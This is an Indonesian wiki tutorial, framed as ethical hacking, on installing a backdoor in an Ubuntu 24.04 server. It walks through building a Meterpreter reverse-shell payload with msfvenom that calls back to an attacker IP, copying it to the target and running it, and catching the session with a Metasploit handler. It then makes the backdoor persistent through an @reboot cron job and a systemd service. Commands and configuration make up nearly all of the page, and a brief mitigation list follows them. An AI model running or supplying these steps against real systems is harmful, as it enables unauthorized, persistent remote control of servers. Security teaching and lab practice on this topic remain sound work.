Hands-on: Menginstal Backdoor dan Teknik Persistensi di Sistem Target

From OnnoWiki
Jump to navigation Jump to search

Menginstal backdoor dan menggunakan teknik persistensi di server Ubuntu 24.04 adalah bagian penting dari ethical hacking untuk memahami bagaimana penyerang dapat memperoleh akses berkelanjutan ke sistem. Berikut ini adalah langkah-langkah detail dan contoh teknik hands-on untuk memasang backdoor dan mempertahankan akses di Ubuntu 24.04 Server.

      1. **1. Instalasi Backdoor Menggunakan Metasploit**

Metasploit Framework adalah alat yang efektif untuk menginstal backdoor. Kita akan menggunakan exploit Metasploit untuk memasang backdoor di server.

        1. **Langkah-langkah:**

- **Persiapan:**

 - Jalankan Kali Linux dan buka Metasploit dengan perintah:
   ```bash
   msfconsole
   ```

- **Buat Payload:**

 - Buat payload backdoor (misalnya, reverse shell) yang akan dijalankan di Ubuntu server. Gunakan `msfvenom` untuk membuat file payload.
   ```bash
   msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=your_IP LPORT=your_PORT -f elf > backdoor.elf
   ```
 - Parameter `LHOST` adalah IP mesin penyerang, dan `LPORT` adalah port yang akan digunakan untuk komunikasi.

- **Transfer Payload ke Server Ubuntu:**

 - Gunakan `scp` untuk mentransfer payload ke server Ubuntu 24.04.
   ```bash
   scp backdoor.elf user@server_IP:/tmp/
   ```

- **Jalankan Payload di Server Ubuntu:**

 - Setelah payload berada di server, ubah permission dan jalankan:
   ```bash
   chmod +x /tmp/backdoor.elf
   /tmp/backdoor.elf
   ```

- **Jalankan Handler di Kali Linux:**

 - Siapkan handler di Metasploit untuk menangkap koneksi dari server:
   ```bash
   use exploit/multi/handler
   set payload linux/x64/meterpreter/reverse_tcp
   set LHOST your_IP
   set LPORT your_PORT
   exploit
   ```

- **Akses Meterpreter:**

 - Jika payload berhasil dijalankan, Anda akan mendapatkan sesi `meterpreter`. Contoh perintah dasar:
   ```bash
   meterpreter > sysinfo
   meterpreter > shell
   ```
      1. **2. Teknik Persistensi**

Setelah backdoor terinstal, teknik persistensi diperlukan agar penyerang bisa mendapatkan kembali akses walaupun sistem restart.

        1. **Contoh Teknik Persistensi dengan Cron Job:**

- **Buat Skrip Backdoor:**

 - Misalnya, buat skrip bash untuk menjalankan backdoor secara otomatis setelah server reboot:
   ```bash
   echo -e '#!/bin/bash\n/tmp/backdoor.elf' > /tmp/persist.sh
   chmod +x /tmp/persist.sh
   ```

- **Set Cron Job untuk Menjalankan Backdoor:**

 - Edit crontab pengguna untuk menjalankan skrip ini setiap kali sistem reboot:
   ```bash
   crontab -e
   ```
 - Tambahkan baris berikut ke crontab:
   ```bash
   @reboot /tmp/persist.sh
   ```

- **Verifikasi Cron Job:**

 - Pastikan cron job telah berhasil diset dengan melihat daftar cron:
   ```bash
   crontab -l
   ```
        1. **Contoh Teknik Persistensi dengan Systemd:**

- **Buat Service File:**

 - Buat file service di `/etc/systemd/system/`:
   ```bash
   sudo nano /etc/systemd/system/backdoor.service
   ```
 - Tambahkan konfigurasi berikut:
   ```ini
   [Unit]
   Description=Backdoor Service
   [Service]
   ExecStart=/tmp/backdoor.elf
   Restart=always
   [Install]
   WantedBy=multi-user.target
   ```

- **Enable dan Start Service:**

 - Aktifkan dan mulai service agar berjalan secara otomatis saat boot:
   ```bash
   sudo systemctl enable backdoor.service
   sudo systemctl start backdoor.service
   ```

- **Cek Status Service:**

 - Untuk melihat apakah service backdoor berjalan:
   ```bash
   sudo systemctl status backdoor.service
   ```

Dengan menggunakan salah satu atau kombinasi teknik di atas, penyerang dapat mempertahankan akses ke server. Dalam konteks ethical hacking, hal ini penting untuk dipelajari agar kita dapat memahami bagaimana serangan ini terjadi dan bagaimana langkah-langkah mitigasi yang bisa diambil untuk mencegahnya.

      1. **Mitigasi:**

Untuk mencegah backdoor dan persistensi, beberapa langkah mitigasi yang perlu diambil antara lain: - Secara berkala memeriksa cron jobs yang mencurigakan. - Mengecek service yang baru ditambahkan di systemd. - Menggunakan IDS/IPS untuk mendeteksi koneksi yang tidak sah. - Mengaktifkan audit log untuk mendeteksi perubahan konfigurasi sistem.

Apakah ada langkah yang perlu dijelaskan lebih lanjut?


Pranala Menarik